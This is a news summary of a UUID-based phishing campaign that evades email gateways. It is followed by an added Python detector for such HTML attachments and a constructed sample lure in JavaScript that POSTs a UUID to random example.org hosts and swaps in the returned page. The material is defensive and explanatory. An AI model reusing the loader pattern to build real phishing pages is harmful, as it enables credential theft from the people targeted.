Phishing Attack Uses UUID Trick to Evade Email Security
A new phishing attack uses UUID-based techniques to bypass Secure Email Gateways, relying on dynamically generated identifiers and randomized domains to evade detection. Security researchers at Cofense identified the campaign in early February 2025, highlighting its use of JavaScript embedded in HTML attachments or in pages spoofing services like SharePoint, OneDrive, and Adobe Acrobat Sign.
Unlike conventional methods, this phishing attack uses UUIDs to track victims and distinguish campaigns. The script selects one of several .org domains that lack recognizable patterns, which helps it evade machine-learning detection and blocklists. It then sends a POST request containing a dynamic UUID to an API endpoint.
The server responds with tailored login pages that mimic corporate environments, replacing webpage content through DOM manipulation without altering the URL. This dynamic page replacement increases realism and minimizes user suspicion, allowing attackers to harvest credentials seamlessly.
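For mail-filtering and triage teams, the traits described above can be checked together in an HTML attachment. The following is an added example, not code from Cofense or the campaign: the regexes, the threshold of three indicators, and both sample attachments are assumptions constructed for illustration.

```python
import re

# Indicators follow the behaviour described in the article; the patterns are
# assumptions of this example, not signatures published by Cofense.
UUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}|crypto\.randomUUID\(", re.I)
ORG_HOST_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+org\b", re.I)
POST_RE = re.compile(r"method\s*:\s*[\"']POST[\"']|\.open\(\s*[\"']POST[\"']|\$\.post\(", re.I)
DOM_SWAP_RE = re.compile(r"document\.(?:write|open)\(|\.(?:innerHTML|outerHTML)\s*=|\.replaceWith\(")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)

def score_attachment(html):
    """Return (score, reasons) for one HTML attachment body."""
    js = "\n".join(SCRIPT_RE.findall(html))  # only inline script content is scored
    reasons = []
    hosts = {h.lower() for h in ORG_HOST_RE.findall(js)}
    if len(hosts) >= 2:
        reasons.append("several .org hosts in script: %d" % len(hosts))
    if UUID_RE.search(js):
        reasons.append("UUID literal or generator in script")
    if POST_RE.search(js):
        reasons.append("script issues a POST request")
    if DOM_SWAP_RE.search(js):
        reasons.append("script replaces page content")
    return len(reasons), reasons

def is_suspicious(html, threshold=3):
    # Each trait alone is common in benign pages; the combination is the signal.
    return score_attachment(html)[0] >= threshold

# Constructed sample mirroring the described pattern (reserved example.org names).
SAMPLE_LURE = """<html><body><script>
var hosts = ["kqzt.example.org", "wvbn.example.org", "plmx.example.org"];
var h = hosts[Math.floor(Math.random() * hosts.length)];
fetch("https://" + h + "/api", {method: "POST",
  body: JSON.stringify({id: "123e4567-e89b-12d3-a456-426614174000"})})
  .then(function (r) { return r.text(); })
  .then(function (t) { document.documentElement.innerHTML = t; });
</script></body></html>"""

# Constructed benign attachment: one DOM write, no remote hosts in script.
SAMPLE_BENIGN = """<html><body><h1>Invoice</h1><script>
document.getElementById("total").innerHTML = "42.00";
</script><a href="https://www.example.org/help">Help</a></body></html>"""

if __name__ == "__main__":
    for name, body in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(name, is_suspicious(body), score_attachment(body)[1])
```

Obfuscated or encoded scripts will not match these patterns directly, so a check like this belongs after any decoding or deobfuscation step the gateway already performs.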
Read the full report at: New Phishing Attack Bypasses Using UUIDs Unique to Bypass Secure Email Gateways
